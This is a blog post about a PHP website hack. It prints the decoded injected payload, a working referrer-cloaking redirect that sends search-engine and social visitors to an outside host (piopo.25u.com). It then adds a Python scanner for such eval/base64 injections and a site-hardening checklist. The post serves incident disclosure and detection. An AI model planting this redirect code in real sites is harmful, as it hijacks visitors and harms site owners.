Yesterday every PHP code file on our company website was found to contain an injected snippet of code. What the code does is redirect visitors arriving from Bing and Google to a specified URL; since Baidu is not on its list, it was most likely the work of overseas attackers. "Hacker" is a word that sounds exciting, but it is still better when it does not happen to you. Because the company platform had only just launched and did not yet have many users, fortunately no especially serious damage was done. Below I paste the injected code for the reference of anyone unlucky enough to run into the same thing later.
base64_decode("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");
The attacker used eval() to execute the code string returned by base64_decode(). Printing that return value out, it looks like this:
error_reporting(0); // suppress all PHP errors so the injection stays silent
$qazplm = headers_sent();
if (!$qazplm) {
    $referer = $_SERVER['HTTP_REFERER'];
    $uag = $_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (!stristr($uag, "MSIE 7.0")) {
            // only visitors arriving from a search engine, social network or URL shortener are targeted
            if (stristr($referer, "yahoo") or stristr($referer, "bing") or stristr($referer, "rambler")
                or stristr($referer, "gogo") or stristr($referer, "live.com") or stristr($referer, "aport")
                or stristr($referer, "nigma") or stristr($referer, "webalta") or stristr($referer, "begun.ru")
                or stristr($referer, "stumbleupon.com") or stristr($referer, "bit.ly") or stristr($referer, "tinyurl.com")
                or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/", $referer)
                or preg_match("/google\.(.*?)\/url\?sa/", $referer)
                or stristr($referer, "myspace.com") or stristr($referer, "facebook.com") or stristr($referer, "aol.com")) {
                // skip cached-copy / search-operator referrers, then redirect and stop rendering the real page
                if (!stristr($referer, "cache") or !stristr($referer, "inurl")) {
                    header("Location: http://piopo.25u.com/");
                    exit();
                }
            }
        }
    }
}
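The injection above has a recognisable shape: an eval() wrapped around a base64_decode() of a literal string, whose decoded payload sniffs HTTP_REFERER and issues a Location header. The following scanner is an added example, not code from the original post; it walks a directory of PHP files, decodes any such literal and reports whether the payload carries those referrer-cloaking indicators. The sample PHP files and the redirect URL in them are constructed here for the demonstration.

```python
import base64
import re
from pathlib import Path

# eval( base64_decode( "<literal>" ) ) -- the injection pattern described in the post
EVAL_B64 = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)')

# Strings the decoded payload above combines: silenced errors, header check,
# referrer sniffing and an unconditional redirect.
INDICATORS = ("error_reporting", "headers_sent", "HTTP_REFERER", "Location:")


def scan_php_source(src: str) -> list:
    """Return one finding per eval(base64_decode(...)) occurrence in src."""
    findings = []
    for m in EVAL_B64.finditer(src):
        try:
            payload = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:          # not valid base64: still report the eval, but nothing decoded
            payload = ""
        hits = [ind for ind in INDICATORS if ind in payload]
        findings.append({
            "offset": m.start(),
            "decoded_len": len(payload),
            "indicators": hits,
            # referrer-conditional redirect = the cloaking behaviour seen in this incident
            "redirect_cloak": "HTTP_REFERER" in hits and "Location:" in hits,
        })
    return findings


def scan_tree(root) -> dict:
    """Map each *.php path under root to its findings (files with none are omitted)."""
    report = {}
    for path in Path(root).rglob("*.php"):
        found = scan_php_source(path.read_text(errors="replace"))
        if found:
            report[str(path)] = found
    return report


# Constructed samples (not the real payload): a placeholder redirect target is used.
SAMPLE_PAYLOAD = ('error_reporting(0); if (!headers_sent()) { $r = $_SERVER["HTTP_REFERER"];'
                  ' if (stristr($r, "bing") or stristr($r, "google")) {'
                  ' header("Location: http://redirect-target.example/"); exit(); } }')
SAMPLE_INJECTED = ('<?php eval(base64_decode("'
                   + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
                   + '")); ?>\n<?php echo "site content"; ?>')
SAMPLE_CLEAN = '<?php echo base64_decode("aGVsbG8="); ?>'   # legitimate decode, no eval

if __name__ == "__main__":
    print(scan_php_source(SAMPLE_INJECTED))
```

Run against the web root (scan_tree("/path/to/webroot")) after an incident or from a cron job; any file with a finding whose redirect_cloak is true matches this campaign's behaviour and should be restored from a known-good copy.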
I do not know where the weakness was that gave the attacker permission to write code into all of my PHP files. Afterwards I ran a scan with the 360 website security tool and it found a series of problems.
Here is a record of the measures taken afterwards to harden the site:
1. Turn off PHP script error display
2. Guard against cross-site scripting vulnerabilities by filtering the data users submit
3. Disable directory listing for the site
4. Set the website code folders and files to read-only
5. Disable the Apache server's TRACE method to prevent cross-site scripting attacks
6. Rewrite all publicly visible PHP links on the front end as pseudo-static URLs, improving both site security and SEO friendliness
7. Set up scheduled database backups